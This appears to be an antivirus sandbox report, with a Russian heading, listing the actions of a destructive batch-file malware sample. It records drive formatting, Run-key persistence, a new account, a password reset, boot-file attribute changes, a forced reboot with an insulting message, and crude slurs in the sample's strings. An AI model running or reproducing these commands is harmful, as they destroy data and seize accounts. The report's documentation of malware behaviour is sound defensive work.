Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '$peer' = '%WINDIR%\TheBat.bat'
- <SYSTEM32>\format.com F:/g/y
- <SYSTEM32>\format.com g:/g/y
- <SYSTEM32>\attrib.exe -r -s -h %WINDIR%\win.ini
- <SYSTEM32>\format.com E:/g/y
- <SYSTEM32>\format.com H:/g/y
- <SYSTEM32>\net1.exe user your mums a lesbian yourmumsfat /add
- <SYSTEM32>\cmd.exe /c ""%TEMP%\selfdel0.bat" "
- <SYSTEM32>\format.com i:/g/ycd\
- <SYSTEM32>\shutdown.exe -r -t 10 -c "haha c drive deleted cock"
- <SYSTEM32>\attrib.exe -r -s -h C:\ntldr
- <SYSTEM32>\attrib.exe +H "%WINDIR%\MyBat.bat"
- <SYSTEM32>\net1.exe user "%USERNAME%" "123123"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\batchfile.bat" "
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run" /f /v "$peer" /t "REG_SZ" /d "%WINDIR%\TheBat.bat"
- <SYSTEM32>\label.exe yourgay
- <SYSTEM32>\attrib.exe -r -s -h C:\autoexec.bat
- <SYSTEM32>\attrib.exe -r -s -h c:\boot.ini
- <SYSTEM32>\rundll32.exe shell32.dll,Activate_RunDLL
- <SYSTEM32>\rundll32.exe USER32.DLL,SwapMouseButton
- %TEMP%\selfdel0.bat
- %TEMP%\1.tmp\batchfile.bat
- %TEMP%\1.tmp\batchfile.bat
- %WINDIR%\win.ini